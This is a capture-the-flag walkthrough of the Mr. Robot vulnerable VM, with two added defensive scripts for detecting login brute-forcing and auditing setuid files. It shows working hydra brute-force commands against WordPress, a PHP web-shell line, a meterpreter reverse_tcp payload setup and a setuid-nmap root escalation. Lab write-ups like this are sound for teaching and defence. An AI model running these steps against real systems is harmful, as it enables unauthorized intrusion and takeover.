Mr. Robot
Vulnerable VM image
This system was set up with a host-only network on VirtualBox 5.2.
Download from vulnhub or magnet
Enumeration
Started with nmap, basic settings:
# nmap -sS --script vuln 192.168.56.101 -A
Starting Nmap 7.70 ( https://nmap.org ) at 2018-04-07 23:19 UTC
Pre-scan script results:
|_broadcast-avahi-dos: ERROR: Script execution failed (use -d to debug)
Nmap scan report for 192.168.56.101
Host is up (0.00084s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.56.101
| Found the following possible CSRF vulnerabilities:
…
| Path: http://192.168.56.101:80/wp-login.php
| Form id: loginform
|_ Form action: http://192.168.56.101/wp-login.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /admin/: Possible admin folder
| /admin/index.html: Possible admin folder
| /wp-login.php: Possible admin folder
Looks like this is a WordPress blog. Also robots.txt:
# curl http://192.168.56.101/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt
Looks like a dictionary file of some sort. 858k lines is a lot, but once sorted and deduplicated it is far fewer:
# wc -l fsocity.dic
858160 fsocity.dic
# sort fsocity.dic | uniq > fsocity.sorted
# wc -l fsocity.sorted
11451 fsocity.sorted
The tool of choice for WordPress is wpscan. However, with default settings it’s not terribly helpful for figuring out usernames:
# wpscan -u 192.168.56.101 --enumerate u
[+] Enumerating usernames ...
[+] We did not enumerate any usernames
WordPress has a weakness that allows brute-force guessing of usernames: login attempts for users that don’t exist return the string “Invalid username” in the response, while attempts for existing users do not. Switching to hydra, it’s easier to make progress:
# hydra -L fsocity.sorted -p asdf 192.168.56.101 http-form-post "/wp-login.php:log=^USER^&pwd=^PASS^:Invalid username"
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2018-04-08 00:52:00
[DATA] max 16 tasks per 1 server, overall 16 tasks, 11452 login tries (l:11452/p:1), ~716 tries per task
[DATA] attacking http-post-form://192.168.56.101:80//wp-login.php:log=^USER^&pwd=^PASS^:Invalid username
[STATUS] 619.00 tries/min, 619 tries in 00:01h, 10833 to do in 00:18h, 16 active
[STATUS] 613.67 tries/min, 1841 tries in 00:03h, 9611 to do in 00:16h, 16 active
[80][http-post-form] host: 192.168.56.101 login: ELLIOT password: asdf
[80][http-post-form] host: 192.168.56.101 login: Elliot password: asdf
[STATUS] 618.14 tries/min, 4327 tries in 00:07h, 7125 to do in 00:12h, 16 active
[STATUS] 617.08 tries/min, 7405 tries in 00:12h, 4047 to do in 00:07h, 16 active
[80][http-post-form] host: 192.168.56.101 login: elliot password: asdf
[STATUS] 617.06 tries/min, 10490 tries in 00:17h, 962 to do in 00:02h, 16 active
[STATUS] 616.83 tries/min, 11103 tries in 00:18h, 349 to do in 00:01h, 16 active
1 of 1 target successfully completed, 3 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-04-08 01:10:35
It even looks like the username is not case sensitive. Running hydra again with only a small change should reveal the password, if it’s in this wordlist:
# hydra -f -l elliot -P fsocity.sorted 192.168.56.101 http-form-post "/wp-login.php:log=^USER^&pwd=^PASS^:incorrect"
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2018-04-08 01:16:14
[DATA] max 16 tasks per 1 server, overall 16 tasks, 11452 login tries (l:1/p:11452), ~716 tries per task
[DATA] attacking http-post-form://192.168.56.101:80//wp-login.php:log=^USER^&pwd=^PASS^:incorrect
[STATUS] 568.00 tries/min, 568 tries in 00:01h, 10884 to do in 00:20h, 16 active
[STATUS] 562.67 tries/min, 1688 tries in 00:03h, 9764 to do in 00:18h, 16 active
[STATUS] 558.86 tries/min, 3912 tries in 00:07h, 7540 to do in 00:14h, 16 active
[80][http-post-form] host: 192.168.56.101 login: elliot password: ER28-0652
[STATUS] attack finished for 192.168.56.101 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-04-08 01:23:27
With the username and password, an admin login is now possible.
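Both hydra runs above leave the same trace in the web server's access log: hundreds of POSTs to /wp-login.php from one client inside a few minutes. The following detector is an added example (not part of the original post) that flags that pattern in Apache combined-format log lines; the sample lines, the window and threshold values, and the "Mozilla/4.0 (Hydra)" user agent in them are all constructed here.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache "combined" log format; only the fields the detector needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    """Parse one access-log line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), TS_FMT),
        "method": m.group("method"),
        "path": m.group("path").split("?", 1)[0],   # drop any query string
        "status": int(m.group("status")),
    }

def find_login_bursts(lines, window_s=60, threshold=20):
    """Return {ip: peak_count} for clients that POST to /wp-login.php more than
    `threshold` times inside any `window_s`-second window. Lines are assumed to
    be in chronological order, as Apache writes them."""
    recent = defaultdict(deque)   # per-client timestamps still inside the window
    hits = {}
    for line in lines:
        ev = parse_line(line)
        if not ev or ev["method"] != "POST" or ev["path"] != "/wp-login.php":
            continue
        q = recent[ev["ip"]]
        q.append(ev["ts"])
        while (ev["ts"] - q[0]).total_seconds() > window_s:
            q.popleft()               # expire attempts older than the window
        if len(q) > threshold:
            hits[ev["ip"]] = max(hits.get(ev["ip"], 0), len(q))
    return hits

# Constructed sample: 25 rapid POSTs from one client (the shape a wordlist run
# leaves behind) plus ordinary traffic from a second client.
SAMPLE_LOG = [
    f'192.168.56.1 - - [08/Apr/2018:00:52:{i:02d} +0000] "POST /wp-login.php HTTP/1.1" 200 3412 "-" "Mozilla/4.0 (Hydra)"'
    for i in range(25)
] + [
    '192.168.56.50 - - [08/Apr/2018:00:53:10 +0000] "GET /wp-login.php HTTP/1.1" 200 2891 "-" "Mozilla/5.0"',
    '192.168.56.50 - - [08/Apr/2018:00:53:40 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(find_login_bursts(SAMPLE_LOG))   # {'192.168.56.1': 25}
```

Feeding the real access log in with `find_login_bursts(open("/var/log/apache2/access.log"))` gives the same result on a live server; the username-enumeration run would show up just as clearly, since a wrong password and a wrong username both produce a POST.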
!! Low privs
With admin control of a WordPress blog, the easiest thing to do is edit a theme file, like the 404 file, and insert some sort of PHP web shell. It can be as simple as @passthru($_POST['cmd']);
or as complicated as a meterpreter session:
> use payload/php/meterpreter/reverse_tcp
> set LHOST 192.168.56.1
> set LPORT 443
> generate -t raw
> to_handler
Opening a shell reveals that the web server runs as the daemon user.
!! Root privs
Following standard local file enumeration gets a list of setuid (and setgid) programs:
$ find / -perm /6000 -type f 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/mail-touchlock
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/screen
/usr/bin/mail-unlock
/usr/bin/mail-lock
/usr/bin/chsh
/usr/bin/crontab
/usr/bin/chfn
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/expiry
/usr/bin/dotlockfile
/usr/bin/sudo
/usr/bin/ssh-agent
/usr/bin/wall
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
/sbin/unix_chkpwd
It’s not normal for nmap to have the setuid bit set. This is probably the way in:
/usr/local/bin/nmap --interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
id
uid=1(daemon) gid=1(daemon) euid=0(root) groups=0(root),1(daemon)
While the real uid of the sh process spawned by nmap is still 1 (daemon), the effective uid is 0, so it is possible to do anything as the root user.
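The hand-installed setuid nmap is exactly what a periodic setuid audit is meant to catch. The script below is an added example (not from the original post): it walks the filesystem for the same population `find / -perm /6000 -type f` reports, then compares the result against a baseline taken at install time and flags anything new or anything outside package-managed directories. The baseline, the directory list and the shortened listing are constructed here from the output above.

```python
import os
import stat

# Directories where the distribution's package manager installs setuid binaries.
# Anything elsewhere (/usr/local, /opt, /home, /tmp, ...) was put there by hand
# and needs a justification.
PACKAGE_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/", "/lib/")

def find_setid_files(root):
    """Return the set of regular files under `root` with the setuid or setgid
    bit set: the same population `find / -perm /6000 -type f` reports."""
    found = set()
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)       # lstat: a symlink's own mode is irrelevant
            except OSError:
                continue                  # unreadable or vanished; skip it
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                found.add(path)
    return found

def audit_setid(current, baseline):
    """Compare a live listing against a known-good baseline.
    Returns [(path, [reasons])] for every file that needs a look."""
    findings = []
    for path in sorted(current):
        reasons = []
        if path not in baseline:
            reasons.append("not in baseline")
        if not path.startswith(PACKAGE_DIRS):
            reasons.append("outside package-managed directories")
        if reasons:
            findings.append((path, reasons))
    return findings

# Constructed sample: a subset of the listing from the box above, and a baseline
# that is the same host before nmap was installed by hand.
PAGE_LISTING = {
    "/bin/ping", "/bin/umount", "/bin/mount", "/bin/ping6", "/bin/su",
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/screen", "/usr/bin/crontab",
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/pt_chown", "/sbin/unix_chkpwd",
    "/usr/local/bin/nmap",
}
BASELINE = PAGE_LISTING - {"/usr/local/bin/nmap"}

if __name__ == "__main__":
    for path, reasons in audit_setid(PAGE_LISTING, BASELINE):
        print(path, "->", "; ".join(reasons))
```

On a real host, run `audit_setid(find_setid_files("/"), baseline)` as root from cron and store the baseline somewhere the audited host cannot modify.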